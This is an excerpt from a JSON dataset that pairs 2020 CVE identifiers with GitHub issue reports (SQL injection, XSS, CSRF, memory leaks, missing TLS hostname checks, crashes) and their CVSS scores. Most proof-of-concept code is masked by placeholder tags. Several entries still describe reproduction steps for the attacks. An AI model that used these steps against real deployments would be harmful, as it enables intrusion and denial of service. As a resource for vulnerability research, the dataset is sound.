  47432. "description": "Memory leak in APITAG APITAG library parser APITAG Description of defect References: URLTAG FILETAG File: FILETAG Example Trace NUMBERTAG Byte leak): ERRORTAG Example Trace (double NUMBERTAG Byte leak): ERRORTAG Analysis: If a packet containing multiple options with the same effective option number but with non-zero deltas is processed, it may lead to a memory leak. This issue is related to: URLTAG The parser assumes in APITAG that options with the same number can occur only adjacent to each other, using a zero delta after the first option with a given number. This is not true: due to integer overflow in the option number addition it is possible to craft a packet in which multiple options resolve to the same option number in arbitrary order. In conjunction with the lack of a check whether the pointer already references allocated memory before it is overwritten with newly allocated space, this leads to a memory leak because the earlier buffer is orphaned. The integer overflow is described in detail in: URLTAG The uint NUMBERTAG variable overflow can happen at: URLTAG and URLTAG If more than one occurrence of an option with the same number is encountered by APITAG, the APITAG may allocate a new memory buffer and overwrite the pointer to the previously allocated memory in: URLTAG or URLTAG or URLTAG or URLTAG As a result the previously allocated buffer is orphaned and never freed. Patch proposal: URLTAG Type: Integer Overflow or Wraparound Memory leak / heap exhaustion Result: Excessive memory usage Possible crash due to lack of resources Denial of Service Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. ERRORTAG FILETAG FILETAG FILETAG",
  47433. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47434. "severity": "HIGH",
  47435. "baseScore": 7.5,
  47436. "impactScore": 3.6,
  47437. "exploitabilityScore": 3.9
  47438. },
  47439. {
  47440. "CVE_ID": "CVE-2020-12887",
  47441. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12930",
  47442. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12930",
  47443. "Repo_new": "armmbed/mbed-os",
  47444. "Issue_Created_At": "2020-05-05T21:10:48Z",
  47445. "description": "Integer overflow in APITAG APITAG library parser. Description of defect References: URLTAG FILETAG File: FILETAG Analysis: An unhandled roll-over of the option length variable occurs if extended option length encoding is used with a length of NUMBERTAG encoded. The frame is then processed further using the rolled-over length value instead of being rejected as malformed. URLTAG Type: Integer Overflow or Wraparound Result: Undetected malformed frame Incorrect packet parsing Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? N/A",
  47446. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47447. "severity": "HIGH",
  47448. "baseScore": 7.5,
  47449. "impactScore": 3.6,
  47450. "exploitabilityScore": 3.9
  47451. },
  47452. {
  47453. "CVE_ID": "CVE-2020-13118",
  47454. "Issue_Url_old": "https://github.com/adeoluwa-adebiyi/Mikrotik-Router-Monitoring-System/issues/4",
  47455. "Issue_Url_new": "https://github.com/adeoluwa-adebiyi/mikrotik-router-monitoring-system/issues/4",
  47456. "Repo_new": "adeoluwa-adebiyi/mikrotik-router-monitoring-system",
  47457. "Issue_Created_At": "2020-05-16T17:52:00Z",
  47458. "description": "Security issue: SQL injection. Vulnerability type: SQL injection vulnerability code: in file ERRORTAG : ERRORTAG Parameter $community exists in sql injection. poc: ERRORTAG FILETAG",
  47459. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47460. "severity": "CRITICAL",
  47461. "baseScore": 9.8,
  47462. "impactScore": 5.9,
  47463. "exploitabilityScore": 3.9
  47464. },
  47465. {
  47466. "CVE_ID": "CVE-2020-13121",
  47467. "Issue_Url_old": "https://github.com/Submitty/Submitty/issues/5265",
  47468. "Issue_Url_new": "https://github.com/submitty/submitty/issues/5265",
  47469. "Repo_new": "submitty/submitty",
  47470. "Issue_Created_At": "2020-04-19T16:32:45Z",
  47471. "description": "APITAG Bug] Open Redirection Vulnerability at Login Page. Describe the bug It is possible to redirect a user to an attacker owned domain and trick the user. I am investigating the potential chaining of this bug to perform other attacks. Expected behavior Redirection to external urls must not be allowed. To Reproduce This occurs at the main login page when the user enters an invalid username/password. The url gets changed to APITAG An attacker can change the url (to any attacker owned domain which may mimic the Submitty interface) to something like APITAG and redirect users to google.com after they enter their credentials. Additional context This can be prevented either by NUMBERTAG validating the redirect url against an allowlist of permitted destinations (a regex check on the url alone is error-prone), or NUMBERTAG completely removing GET request based url redirection. I am trying to fix this but thought to create this issue for others to contribute the fix if interested.",
  47472. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47473. "severity": "MEDIUM",
  47474. "baseScore": 6.1,
  47475. "impactScore": 2.7,
  47476. "exploitabilityScore": 2.8
  47477. },
  47478. {
  47479. "CVE_ID": "CVE-2020-13128",
  47480. "Issue_Url_old": "https://github.com/manolo/gwtupload/issues/33",
  47481. "Issue_Url_new": "https://github.com/manolo/gwtupload/issues/33",
  47482. "Repo_new": "manolo/gwtupload",
  47483. "Issue_Created_At": "2020-02-17T21:17:42Z",
  47484. "description": "Upload delay resulting in APITAG There is a vulnerability which allows an APITAG attack to be performed against the application server. The problem lies in the handling of the delay parameter when an upload is initiated ( APITAG ). The value of this parameter is used as an argument for the APITAG invocation. A malicious user can specify even the maximum integer value NUMBERTAG, which would cause a thread to sleep for almost NUMBERTAG days ( APITAG ). Additionally, the value from the delay parameter is assigned to a field which, in the case of servlets, behaves as a global variable. This means every subsequent request will use this value and will also be put to sleep. Putting a thread to sleep removes it from the limited pool of available threads, so after a suitable number of upload requests ( APITAG by default has a limit of NUMBERTAG threads) the whole application will become unresponsive and will not accept any new requests. FILETAG ERRORTAG FILETAG ERRORTAG The servlet accepts the APITAG parameter in the same way, but its abuse will only prevent files from being uploaded; the server itself won't suffer.",
  47485. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47486. "severity": "HIGH",
  47487. "baseScore": 7.5,
  47488. "impactScore": 3.6,
  47489. "exploitabilityScore": 3.9
  47490. },
  47491. {
  47492. "CVE_ID": "CVE-2020-13163",
  47493. "Issue_Url_old": "https://github.com/ConradIrwin/em-imap/issues/25",
  47494. "Issue_Url_new": "https://github.com/conradirwin/em-imap/issues/25",
  47495. "Repo_new": "conradirwin/em-imap",
  47496. "Issue_Created_At": "2020-05-18T21:43:41Z",
  47497. "description": "Security vulnerability: missing SSL hostname validation. APITAG Security Lab (GHSL) Vulnerability Report: APITAG The FILETAG team has identified potential security vulnerabilities in em imap URLTAG . We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team. If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at APITAG (please include your APITAG ). If you are _NOT_ the correct point of contact for this report, please let us know! Summary Missing hostname validation allows an attacker to perform a man in the middle attack against users of the library. Product em imap Tested Version NUMBERTAG Missing SSL/TLS certificate hostname validation em imap URLTAG uses the library eventmachine URLTAG in an insecure way that allows an attacker to perform a man in the middle attack against users of the library. Impact An attacker can assume the identity of a trusted server and introduce malicious data in an otherwise trusted place. Remediation Implement hostname validation, i.e. verify that the certificate presented by the server matches the hostname the client intended to connect to. Resources To trigger the vulnerability, a simple TLS enabled listening daemon is sufficient as described in the following snippets. CODETAG Create a sample client with the following contents: ERRORTAG Run the example client to see a connection being performed in the listening daemon initialized in the previous steps. APITAG References FILETAG APITAG Security Advisories We recommend you create a private APITAG Security Advisory URLTAG for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published URLTAG . Credit This issue was discovered and reported by GHSL team member MENTIONTAG APITAG Gianni) URLTAG . Contact You can contact the GHSL team at APITAG , please include the APITAG in any communication regarding this issue. Disclosure Policy This report is subject to our coordinated disclosure policy URLTAG .",
  47498. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  47499. "severity": "HIGH",
  47500. "baseScore": 7.4,
  47501. "impactScore": 5.2,
  47502. "exploitabilityScore": 2.2
  47503. },
  47504. {
  47505. "CVE_ID": "CVE-2020-13225",
  47506. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/3025",
  47507. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/3025",
  47508. "Repo_new": "phpipam/phpipam",
  47509. "Issue_Created_At": "2020-05-17T10:45:44Z",
  47510. "description": "Stored XSS in User Instructions Widget. Within the Edit User Instructions field where you can enter source code you are able to generate scripting that then executes in the user's browser when they click on the instructions page. POC: APITAG Additionally, APITAG will also execute scripting in the browser. POC video is available here: URLTAG",
  47511. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  47512. "severity": "MEDIUM",
  47513. "baseScore": 4.8,
  47514. "impactScore": 2.7,
  47515. "exploitabilityScore": 1.7
  47516. },
  47517. {
  47518. "CVE_ID": "CVE-2020-13226",
  47519. "Issue_Url_old": "https://github.com/wso2/product-apim/issues/7677",
  47520. "Issue_Url_new": "https://github.com/wso2/product-apim/issues/7677",
  47521. "Repo_new": "wso2/product-apim",
  47522. "Issue_Created_At": "2020-03-10T05:23:03Z",
  47523. "description": "Deploy endpoint validation API in API Gateway. Describe your problem(s) Currently, the API endpoint validation ( APITAG ) in the Publisher portal is happening via direct HTTP Head call initiated from the Publisher node. This is less secure when the Publisher node has direct access to other services in the same private network layer. Describe your solution Make endpoint validation request goes through WSO2 API Gateway. How will you implement it Deploy the API APITAG by default for each tenant in API Gateway. If needed, provide admin users with the capability to set rate limiting as well, so that request bursting will be prevented.",
  47524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47525. "severity": "CRITICAL",
  47526. "baseScore": 9.8,
  47527. "impactScore": 5.9,
  47528. "exploitabilityScore": 3.9
  47529. },
  47530. {
  47531. "CVE_ID": "CVE-2020-13226",
  47532. "Issue_Url_old": "https://github.com/wso2/docs-apim/issues/816",
  47533. "Issue_Url_new": "https://github.com/wso2/docs-apim/issues/816",
  47534. "Repo_new": "wso2/docs-apim",
  47535. "Issue_Created_At": "2020-03-10T05:34:53Z",
  47536. "description": "Add n/w level security guideline to restrict outbound connections of Publisher node. Description: in a WSO2 API M deployment, we recommend restricting outbound connections of the Publisher node to only the required internal nodes (only the nodes the Publisher portal is intended to communicate with) of the deployment. So even if privileged user credentials are compromised by a user with malicious intent, they cannot use the existing functionalities to perform network scans against the other services exposed in the same private network as the Publisher node.",
  47537. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47538. "severity": "CRITICAL",
  47539. "baseScore": 9.8,
  47540. "impactScore": 5.9,
  47541. "exploitabilityScore": 3.9
  47542. },
  47543. {
  47544. "CVE_ID": "CVE-2020-13230",
  47545. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3343",
  47546. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3343",
  47547. "Repo_new": "cacti/cacti",
  47548. "Issue_Created_At": "2020-03-11T14:37:20Z",
  47549. "description": "Improper Access Control on disabling a user. Describe the bug Cacti admin console provides a functionality to disable a created user, which revokes that user's privileges to perform any action, but the disabled user's existing session remains usable: if a page is auto refreshed, the disabled user can still view updated data. To Reproduce Steps to reproduce the behavior NUMBERTAG Log in with Admin account and navigate to URLTAG NUMBERTAG Give the new user permission to view logs NUMBERTAG Login to new user's account and navigate FILETAG NUMBERTAG From Admin's account disable the created user. Actual behavior A disabled user can still view the system logs, and the logs keep updating after each refresh interval. Expected behavior A disabled user should not be privileged to view the system logs; disabling an account should invalidate its active sessions. OS: Ubuntu Browser: Firefox Version Cacti NUMBERTAG",
  47550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  47551. "severity": "MEDIUM",
  47552. "baseScore": 4.3,
  47553. "impactScore": 1.4,
  47554. "exploitabilityScore": 2.8
  47555. },
  47556. {
  47557. "CVE_ID": "CVE-2020-13231",
  47558. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3342",
  47559. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3342",
  47560. "Repo_new": "cacti/cacti",
  47561. "Issue_Created_At": "2020-03-11T13:32:33Z",
  47562. "description": "CSRF at Admin Email. Describe the bug A crafted GET request to URLTAG can change the admin email address. Affected URI URLTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' URLTAG NUMBERTAG Turn on a proxy interceptor, I used Burp NUMBERTAG Change the email and save the request NUMBERTAG Change the email in the saved request and send the URL to a logged in admin NUMBERTAG Admin email will be changed Malformed Request: FILETAG Expected behavior State-changing actions such as this should not be performed via GET requests, and anti CSRF tokens should be required on the request. OS: Ubuntu Browser: Firefox Version: Cacti Version NUMBERTAG",
  47563. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  47564. "severity": "MEDIUM",
  47565. "baseScore": 6.5,
  47566. "impactScore": 3.6,
  47567. "exploitabilityScore": 2.8
  47568. },
  47569. {
  47570. "CVE_ID": "CVE-2020-13246",
  47571. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/10549",
  47572. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/10549",
  47573. "Repo_new": "go-gitea/gitea",
  47574. "Issue_Created_At": "2020-03-01T08:47:20Z",
  47575. "description": "Server freezes when transferring the ownership. Gitea version (or commit ref NUMBERTAG Git version NUMBERTAG Operating system: Debian NUMBERTAG Database (use APITAG ): [ ] APITAG [ ] APITAG [ ] MSSQL [x] APITAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [x] No [ ] Not relevant Log gist: Description Today I encountered a strange bug. When I transfer a mirror repository, the server freezes until I manually restart it. I checked the console and log and I don't see any error or warning. When I re migrated the same repository from Github and try to transfer it, it succeeded. But the problem with the old repository persisted. Screenshots",
  47576. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47577. "severity": "HIGH",
  47578. "baseScore": 7.5,
  47579. "impactScore": 3.6,
  47580. "exploitabilityScore": 3.9
  47581. },
  47582. {
  47583. "CVE_ID": "CVE-2020-13258",
  47584. "Issue_Url_old": "https://github.com/contentful/the-example-app.py/issues/44",
  47585. "Issue_Url_new": "https://github.com/contentful/the-example-app.py/issues/44",
  47586. "Repo_new": "contentful/the-example-app.py",
  47587. "Issue_Created_At": "2020-05-21T13:52:53Z",
  47588. "description": "Reflected Xss. Hi Team I found a reflected xss vulnerability. Proof of concept: URLTAG \" APITAG APITAG alert NUMBERTAG APITAG &locale=en US",
  47589. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47590. "severity": "MEDIUM",
  47591. "baseScore": 6.1,
  47592. "impactScore": 2.7,
  47593. "exploitabilityScore": 2.8
  47594. },
  47595. {
  47596. "CVE_ID": "CVE-2020-13429",
  47597. "Issue_Url_old": "https://github.com/grafana/piechart-panel/issues/218",
  47598. "Issue_Url_new": "https://github.com/grafana/piechart-panel/issues/218",
  47599. "Repo_new": "grafana/piechart-panel",
  47600. "Issue_Created_At": "2020-02-05T14:23:34Z",
  47601. "description": "XSS flaw in piechart panel. The pie chart panel is potentially vulnerable to XSS scripting as it processes any javascript in the APITAG Header\" configuration option. e.g. APITAG FILETAG",
  47602. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47603. "severity": "MEDIUM",
  47604. "baseScore": 5.4,
  47605. "impactScore": 2.7,
  47606. "exploitabilityScore": 2.3
  47607. },
  47608. {
  47609. "CVE_ID": "CVE-2020-13438",
  47610. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/23",
  47611. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/23",
  47612. "Repo_new": "rockcarry/ffjpeg",
  47613. "Issue_Created_At": "2020-05-23T17:08:31Z",
  47614. "description": "SEGV in function jfif_encode in APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is segv_ffjpeg_e2 segv_ffjpeg_e2 . I use the following command: APITAG and get: Segmentation fault I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG The gdb reports: CODETAG An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service APITAG",
  47615. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  47616. "severity": "MEDIUM",
  47617. "baseScore": 6.5,
  47618. "impactScore": 3.6,
  47619. "exploitabilityScore": 2.8
  47620. },
  47621. {
  47622. "CVE_ID": "CVE-2020-13439",
  47623. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/24",
  47624. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/24",
  47625. "Repo_new": "rockcarry/ffjpeg",
  47626. "Issue_Created_At": "2020-05-23T17:09:21Z",
  47627. "description": "heap buffer overflow in function jfif_decode at APITAG Tested in Ubuntu NUMBERTAG bit. The tesecase is heap buffer overflow_ffjpeg_d1 CVETAG . I use the following command: APITAG and get: Segmentation fault I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG The gdb reports (absolute path information omitted):: CODETAG An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service APITAG",
  47628. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  47629. "severity": "MEDIUM",
  47630. "baseScore": 6.5,
  47631. "impactScore": 3.6,
  47632. "exploitabilityScore": 2.8
  47633. },
  47634. {
  47635. "CVE_ID": "CVE-2020-13440",
  47636. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/22",
  47637. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/22",
  47638. "Repo_new": "rockcarry/ffjpeg",
  47639. "Issue_Created_At": "2020-05-23T17:07:53Z",
  47640. "description": "SEGV in function bmp_load at APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is segv_ffjpeg_e1 CVETAG . I use the following command: APITAG and get: Segmentation fault I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service APITAG",
  47641. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  47642. "severity": "MEDIUM",
  47643. "baseScore": 6.5,
  47644. "impactScore": 3.6,
  47645. "exploitabilityScore": 2.8
  47646. },
  47647. {
  47648. "CVE_ID": "CVE-2020-13449",
  47649. "Issue_Url_old": "https://github.com/thecodingmachine/gotenberg/issues/199",
  47650. "Issue_Url_new": "https://github.com/gotenberg/gotenberg/issues/199",
  47651. "Repo_new": "gotenberg/gotenberg",
  47652. "Issue_Created_At": "2020-05-25T07:00:23Z",
  47653. "description": "Critical vulnerability. Hi there, I have identified several vulnerabilities in Gotenberg which all lead to arbitrary code execution in the container. Following responsible disclosure model I would like to give contributors more details so that you could fix this. MENTIONTAG : please provide some e mail and pgp key so that I can contact you securely. After fix I'm planning to make a disclosure on seclists. I have also requested CVE IDs for the issues. Best regards!",
  47654. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47655. "severity": "HIGH",
  47656. "baseScore": 7.5,
  47657. "impactScore": 3.6,
  47658. "exploitabilityScore": 3.9
  47659. },
  47660. {
  47661. "CVE_ID": "CVE-2020-13482",
  47662. "Issue_Url_old": "https://github.com/igrigorik/em-http-request/issues/339",
  47663. "Issue_Url_new": "https://github.com/igrigorik/em-http-request/issues/339",
  47664. "Repo_new": "igrigorik/em-http-request",
  47665. "Issue_Created_At": "2020-05-24T21:28:35Z",
  47666. "description": "Security vulnerability: missing SSL hostname validation. APITAG Security Lab (GHSL) Vulnerability Report: APITAG Summary Missing hostname validation allows an attacker to perform a man in the middle attack against users of the library. Product em http request Tested Version NUMBERTAG Missing SSL/TLS certificate hostname validation em http request URLTAG uses the library eventmachine URLTAG in an insecure way that allows an attacker to perform a man in the middle attack against users of the library. Impact An attacker can assume the identity of a trusted server and introduce malicious data in an otherwise trusted place. Remediation Implement hostname validation. Resources To trigger the vulnerability, a simple TLS enabled listening daemon is sufficient as described in the following snippets. ERRORTAG Create a sample client with the following contents: ERRORTAG Run the example client to see a connection being performed in the listening daemon initialized in the previous steps. APITAG References FILETAG APITAG Security Advisories We recommend you create a private APITAG Security Advisory URLTAG for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published URLTAG . Credit This issue was discovered and reported by GHSL team member MENTIONTAG APITAG Gianni) URLTAG .",
  47667. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  47668. "severity": "HIGH",
  47669. "baseScore": 7.4,
  47670. "impactScore": 5.2,
  47671. "exploitabilityScore": 2.2
  47672. },
  47673. {
  47674. "CVE_ID": "CVE-2020-13597",
  47675. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/91507",
  47676. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/91507",
  47677. "Repo_new": "kubernetes/kubernetes",
  47678. "Issue_Created_At": "2020-05-27T19:32:29Z",
  47679. "description": "Placeholder issue. Placeholder issue, please do not delete.",
  47680. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
  47681. "severity": "LOW",
  47682. "baseScore": 3.5,
  47683. "impactScore": 1.4,
  47684. "exploitabilityScore": 1.8
  47685. },
  47686. {
  47687. "CVE_ID": "CVE-2020-13614",
  47688. "Issue_Url_old": "https://github.com/axel-download-accelerator/axel/issues/262",
  47689. "Issue_Url_new": "https://github.com/axel-download-accelerator/axel/issues/262",
  47690. "Repo_new": "axel-download-accelerator/axel",
  47691. "Issue_Created_At": "2020-03-16T22:55:56Z",
  47692. "description": "Axel may not verify server certificate PATHTAG (allowing SSL interception). It looks like Axel's SSL connections do not verify server certificate hostnames. To fix this the SSL context should set a certificate callback or use APITAG to set the intended hostname. This matters because Axel uses APITAG and loads all root authorities from the OS, so without a hostname check any valid certificate issued by any trusted CA for any other hostname would be accepted. See URLTAG for a description of this nuance with the APITAG APIs. Here is the potentially insecure code URLTAG CODETAG",
  47693. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47694. "severity": "MEDIUM",
  47695. "baseScore": 5.9,
  47696. "impactScore": 3.6,
  47697. "exploitabilityScore": 2.2
  47698. },
  47699. {
  47700. "CVE_ID": "CVE-2020-13615",
  47701. "Issue_Url_old": "https://github.com/qorelanguage/qore/issues/3808",
  47702. "Issue_Url_new": "https://github.com/qorelanguage/qore/issues/3808",
  47703. "Repo_new": "qorelanguage/qore",
  47704. "Issue_Created_At": "2020-03-04T06:46:33Z",
  47705. "description": "Qore does not perform hostname validation during certificate NUMBERTAG validation. see: URLTAG",
  47706. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47707. "severity": "MEDIUM",
  47708. "baseScore": 5.9,
  47709. "impactScore": 3.6,
  47710. "exploitabilityScore": 2.2
  47711. },
  47712. {
  47713. "CVE_ID": "CVE-2020-13622",
  47714. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3787",
  47715. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3787",
  47716. "Repo_new": "jerryscript-project/jerryscript",
  47717. "Issue_Created_At": "2020-05-23T17:53:33Z",
  47718. "description": "Assertion 'ecma_is_value_string (value)' failed at PATHTAG APITAG APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
  47719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47720. "severity": "HIGH",
  47721. "baseScore": 7.5,
  47722. "impactScore": 3.6,
  47723. "exploitabilityScore": 3.9
  47724. },
  47725. {
  47726. "CVE_ID": "CVE-2020-13623",
  47727. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3785",
  47728. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3785",
  47729. "Repo_new": "jerryscript-project/jerryscript",
  47730. "Issue_Created_At": "2020-05-23T08:58:58Z",
  47731. "description": "Stack Exhaustion (ecma_proxy_object_get, ecma_proxy_object_set). APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test cases APITAG APITAG",
  47732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47733. "severity": "HIGH",
  47734. "baseScore": 7.5,
  47735. "impactScore": 3.6,
  47736. "exploitabilityScore": 3.9
  47737. },
  47738. {
  47739. "CVE_ID": "CVE-2020-13649",
  47740. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3788",
  47741. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3788",
  47742. "Repo_new": "jerryscript-project/jerryscript",
  47743. "Issue_Created_At": "2020-05-23T17:56:43Z",
  47744. "description": "Assertion 'context_p >error == PARSER_ERR_NO_ERROR' failed at PATHTAG (scanner_scan_all NUMBERTAG APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
  47745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47746. "severity": "HIGH",
  47747. "baseScore": 7.5,
  47748. "impactScore": 3.6,
  47749. "exploitabilityScore": 3.9
  47750. },
  47751. {
  47752. "CVE_ID": "CVE-2020-13649",
  47753. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3786",
  47754. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3786",
  47755. "Repo_new": "jerryscript-project/jerryscript",
  47756. "Issue_Created_At": "2020-05-23T17:46:47Z",
  47757. "description": "NULL dereference in scanner_reverse_info_list. APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG CODETAG",
  47758. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47759. "severity": "HIGH",
  47760. "baseScore": 7.5,
  47761. "impactScore": 3.6,
  47762. "exploitabilityScore": 3.9
  47763. },
  47764. {
  47765. "CVE_ID": "CVE-2020-13757",
  47766. "Issue_Url_old": "https://github.com/sybrenstuvel/python-rsa/issues/146",
  47767. "Issue_Url_new": "https://github.com/sybrenstuvel/python-rsa/issues/146",
  47768. "Repo_new": "sybrenstuvel/python-rsa",
  47769. "Issue_Created_At": "2020-05-27T08:11:51Z",
  47770. "description": "python rsa does not detect ciphertext modification (prepended NUMBERTAG bytes) in PKCS NUMBERTAG Hello, Using this testcase from Google Wycheproof: ERRORTAG CODETAG I found that python rsa (I'm using python rsa NUMBERTAG does not detect if bytes NUMBERTAG have been prepended to the ciphertext using NUMBERTAG and NUMBERTAG bit keys and it decrypts the ciphertext without error. However, python rsa detects if bytes NUMBERTAG have been appended to the ciphertext and does not decrypt the ciphertext. You can see this behaviour with NUMBERTAG and NUMBERTAG bit keys and the testvectors from Google Wycheproof below NUMBERTAG bit test vector: ERRORTAG NUMBERTAG bit test vector: ERRORTAG NUMBERTAG bit test vector: ERRORTAG On the other hand, pcryptodome detects whenever bytes NUMBERTAG are prepended to the ciphertext: ERRORTAG Best regards, Antonio",
  47771. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47772. "severity": "HIGH",
  47773. "baseScore": 7.5,
  47774. "impactScore": 3.6,
  47775. "exploitabilityScore": 3.9
  47776. },
  47777. {
  47778. "CVE_ID": "CVE-2020-13759",
  47779. "Issue_Url_old": "https://github.com/rust-vmm/vm-memory/issues/93",
  47780. "Issue_Url_new": "https://github.com/rust-vmm/vm-memory/issues/93",
  47781. "Repo_new": "rust-vmm/vm-memory",
  47782. "Issue_Created_At": "2020-05-28T06:48:20Z",
  47783. "description": "APITAG issue when using virtio with rust vmm/vm memory. We have identified an issue in the rust vmm vm memory crate that leads to a denial of service APITAG issue if the crate is used in a VMM in conjunction with virtio. The issue affects both vm memory releases NUMBERTAG and NUMBERTAG In our environment, we reproduced this with musl builds on NUMBERTAG and with all aarch NUMBERTAG builds. Issue Description In vm memory, the functions read_obj and write_obj are not doing atomic accesses for all combinations of platform and libc implementations. These reads and writes translate to memcpy, which may be performing byte by byte copies. Using vm memory in the virtio implementation can cause undefined behavior, as descriptor indexes require NUMBERTAG byte atomic accesses. Impact The issue can affect any virtio/emulated device which expects atomic writes for base types longer than NUMBERTAG byte. Observed impact: When the network stack is under load, the driver will try to clear a used descriptor before the index of the descriptor is fully written by the device. When this issue is triggered, the virtio net device will be unable to transmit packets. This leads to VMs using rust vmm/vm memory having their network effectively disconnected by outside network traffic, resulting in both a APITAG vector and an availability issue under normal at load operations. Affected Systems For a VMM to be affected, it must run on aarch NUMBERTAG built with either musl or glibc), or on 